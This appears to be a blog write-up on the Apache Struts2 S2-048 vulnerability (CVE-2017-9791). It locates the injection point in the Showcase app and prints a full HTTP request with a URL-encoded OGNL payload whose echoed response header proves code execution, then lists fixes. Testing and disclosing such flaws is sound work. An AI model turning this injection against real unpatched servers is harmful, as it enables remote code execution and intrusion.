Seems like yesterday when S2-045, the Jakarta Multipart vulnerability was being actively exploited in the wild which allowed remote attackers to execute arbitrary code. A few hours ago a new equally exploitable advisory – S2-048 was made public by the Apache foundation! This is a quick write up to see if we can test an exploit for the Apache Struts2 vulnerability and create a proof of concept code. This vulnerability has been assigned: CVE-2017-9791
What is the Apache Struts2 S2-048 vulnerability about?
The advisory mentions that – Possible RCE in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. It further states that – It is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it’s a Struts 1 action and the value is a part of a message presented to the user, i.e. when using untrusted input as a part of the error message in the ActionMessage class.
From the above information we know that the vulnerability exists in the Apache Struts 2.3.x Showcase application, which is accessible at /struts2-showcase/. The fix on Apache page also mentions the following in the solution:
Always use resource keys instead of passing a raw message to the ActionMessage as shown below, never pass a raw value directly
messages.add("msg", new ActionMessage("struts1.gangsterAdded", gform.getName()));
and never like this
messages.add("msg", new ActionMessage("Gangster " + gform.getName() + " was added"));
With this information, I found a matching file name at this location: /struts2-showcase/integration/saveGangster.action
Taking this forward, I visited my Apache Struts2 installation to find this:
I tried it with the addHeader exploit to get:
http://10.10.31.170:8080/struts2-showcase/integration/saveGangster.action POST /struts2-showcase/integration/saveGangster.action HTTP/1.1 Host: 10.10.31.170:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 194 Cookie: JSESSIONID=2088284AD58C3255F3171251F97EFA9A Connection: keep-alive Upgrade-Insecure-Requests: 1 age=bbb&__checkbox_bustedBefore=true&name=%24%7B%7B%23context%5B%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%5D.addHeader%28%27X-PenTestIT%27%2C3333-2222%29%7D%7D&description=ccc: undefined HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-PenTestIT: 1111 Content-Type: text/html;charset=ISO-8859-1 Transfer-Encoding: chunked Date: Fri, 07 Jul 2017 21:07:52 GMT
Notice the X-PenTestIT header above?
With the OGNL exploit:
Possible ways to protect against Apache Struts2 S2-048 vulnerability:
Follow the solution Apache mentions. I would rather say, disable the Showcase app. Updating to Apache Struts 2.3.33 should also help.